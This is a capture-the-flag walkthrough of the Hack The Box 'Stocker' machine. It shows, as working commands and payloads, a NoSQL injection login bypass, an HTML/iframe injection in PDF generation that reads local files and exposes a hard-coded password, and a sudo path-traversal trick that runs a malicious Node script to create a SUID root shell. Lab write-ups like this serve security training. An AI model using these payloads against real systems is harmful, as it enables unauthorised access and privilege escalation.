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165 lines (83 loc) · 3.71 KB

File metadata and controls

165 lines (83 loc) · 3.71 KB
nmap -p- --min-rate 5000 -Pn  

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After discovering open ports, let's do greater nmap scan.

nmap -A -sC -sV -p22,80  

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From nmap scan, we also see this ip address is resolved into stocker.htb, let's add this into /etc/hosts file.

Our web application is like that.

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Let's do subdomain enumeration via ffuf command.

ffuf -u -H "Host: FUZZ.stocker.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac

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Let's add dev.stocker.htb into /etc/hosts file also.

We have application and login page confronts us.

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Let's look at requests via zap try to add injections.

That's results of wapanalyzer.

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Request&Response body is like that.

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From my enumeration, it is MERN application, that's why we can inject JSON data and it will be NoSQLI payloads.

To do this,

1.First, we need to change Content-Type header into application/json.

2.Then, enter data as JSON standard.

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Now, it's time to add NoSQLI payloads as below which means not equal to this value.

{"username":{"$ne": "dr4ks"}, "password": {"$ne":"dr4ks"}}

Now, we are successfully bypass authentication.

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We have such an application after authentication.

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There's feature that after buying some item, there's PDF file generated which actually information of item about your payment.

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I looked at all requests while this processis happening and find interesting /api/order endpoint.

Let's inject some data into here.

I just delete some value of keys in json structure and see that where application is running.

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Let's inject some payloads to write into .pdf file. For below payload, I add \(backslash) due to escaping " characters.

<img src=\"x\" onerror=\"document.write('test')\" />

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It gives me orderId, while browsing this id, I see that test word is written into .pdf file.

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Now, let's add payload to read index.js file of application.

<img src=\"x\" onerror=\"document.write('<iframe src=file:///var/www/dev/index.js width=100% height=100%></iframe>')\" />

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I read content of this file by browsing this orderID.

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From here, I see hard-coded credentials.


I also read file /etc/passwd to get usernames of machine, that's why it will be password of angoose user.

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angoose: IHeardPassphrasesArePrettySecure

Let's connect into machine via ssh.


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For privilege escalation, I just check sudo -l command's result.

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It means, I can run .js file via root permission, for that I will write malicious .js file which copies /bin/bash and gives SUID permission.

require('child_process').exec('cp /bin/bash /tmp/dr4ks; chown root:root /tmp/dr4ks; chmod 4777 /tmp/dr4ks')

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Let's execute this malicious script.

sudo node /usr/local/scripts/../../../tmp/dr4ks.js 

After execution, let's check SUID privilege is enabled or not via ls -al /tmp/dr4ks.

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We can run this copied bash file via -p option.


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